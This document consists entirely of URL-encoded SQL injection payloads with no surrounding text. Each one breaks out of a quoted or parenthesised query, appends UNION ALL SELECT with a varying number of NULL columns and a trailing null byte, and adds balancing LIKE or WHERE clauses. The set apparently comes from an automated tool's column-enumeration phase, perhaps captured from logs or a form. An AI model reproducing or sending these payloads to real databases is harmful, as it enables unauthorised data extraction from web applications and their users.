1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22mENb%22%20LIKE%20%22mENb 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ajGH%22%20LIKE%20%22ajGH 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22QEbR%22%20LIKE%20%22QEbR 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22MwkW%22%20LIKE%20%22MwkW 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22iCfG%22%20LIKE%20%22iCfG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22gejM%22%20LIKE%20%22gejM 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22corj%22%20LIKE%20%22corj 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22UpIu%22%20LIKE%20%22UpIu 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22NPkp%22%20LIKE%20%22NPkp 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22eXVc%22%20LIKE%20%22eXVc 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22WJUx%22%20LIKE%20%22WJUx 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22LUqV%22%20LIKE%20%22LUqV 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Iasx%22%20LIKE%20%22Iasx 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22byTM%22%20LIKE%20%22byTM 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Tmfi%22%20LIKE%20%22Tmfi 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22tlSq%22%20LIKE%20%22tlSq 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22rBNF%22%20LIKE%20%22rBNF 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22jwUH%22%20LIKE%20%22jwUH 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22enKM%22%20LIKE%20%22enKM 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22UjJC%22%20LIKE%20%22UjJC 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22dnDM%22%20LIKE%20%22dnDM 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22WfBC%22%20LIKE%20%22WfBC 1%29%20WHERE%207719%3D7719%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%202866%3D2866%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%201325%3D1325%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%205919%3D5919%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%206524%3D6524%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%202575%3D2575%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%206840%3D6840%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%209433%3D9433%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%204535%3D4535%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%208935%3D8935%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%204907%3D4907%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%206500%3D6500%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%205715%3D5715%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%202969%3D2969%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 